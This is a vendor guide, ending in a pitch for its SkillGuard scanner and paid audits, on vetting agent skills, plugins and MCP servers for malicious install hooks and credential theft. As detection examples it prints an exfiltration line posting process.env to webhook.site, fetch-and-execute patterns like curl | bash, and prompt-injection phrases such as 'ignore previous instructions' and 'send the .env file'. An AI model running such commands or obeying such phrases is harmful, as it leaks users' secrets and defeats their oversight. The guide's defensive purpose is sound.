SameDayDesk · Guide
Third-party skills, plugins, and MCP servers run with real access to your machine, your files, and your API keys. Researchers have already found 71 malicious skills in the wild, ~26% of published skills carry vulnerabilities, and 30+ MCP CVEs landed in a single 60-day stretch. Here's a practical checklist to vet one before you trust it.
The fastest way to get owned is a script that runs at install time. In package.json, look for lifecycle hooks in scripts: preinstall, install, postinstall, and prepare (which also runs when the package is installed from git). In an MCP server, read the command and args in .mcp.json: that is what launches every time the server starts. If anything runs at install or launch, read exactly what it does.
"scripts": { "postinstall": "node setup.js" } ← runs the moment you `npm install`
It's normal for an MCP server to read one API key from the environment and call that provider. It is not normal to serialize the whole environment or send secrets to an unfamiliar host. Grep for process.env / os.environ near network calls:
fetch("https://webhook.site/…", { body: JSON.stringify(process.env) }) ← exfiltrating the whole environment
fetch("https://api.openai.com", { headers: { Authorization: process.env.OPENAI_API_KEY } }) ← using one key with its own provider
Malicious payloads hide. Watch for eval(atob(...)), base64 -d | sh, curl <unknown-host> | bash, PowerShell -enc, and committed binary files (a compiled blob the build might run). Official installers (curl https://get.nextflow.io | bash) use the same shape, so check the host, not just the pattern.
A skill's SKILL.md and an MCP server's tool descriptions are fed to the model. That's a prompt-injection surface. Look for text that tries to steer the agent: "ignore previous instructions", "do not tell the user", "always auto-approve", "send the .env file". Also check settings for --dangerously-skip-permissions or auto-approve-all configs that disarm your safeguards.
You can grep for all of this by hand, or run a scanner that does it in seconds. SkillGuard is a free, open-source CLI that statically checks a skill, plugin, or MCP server for every red flag above. It never runs the code it's inspecting (it clones the repository and reads files only), so scanning something malicious never executes it on your machine.
npx github:epistemedeus/skillguard https://github.com/owner/repo
It returns a green / yellow / red verdict with the exact files flagged, and an exit code (0/2/3) you can gate CI on.
Run the free scanner, or — if you pull in third-party skills and MCP servers regularly — let us do the deeper work: a $29 human audit of one dependency you're about to trust, or $12/mo Watch mode that re-scans them on every upstream release and alerts you when new risk appears.
SkillGuard → Free CLI on GitHub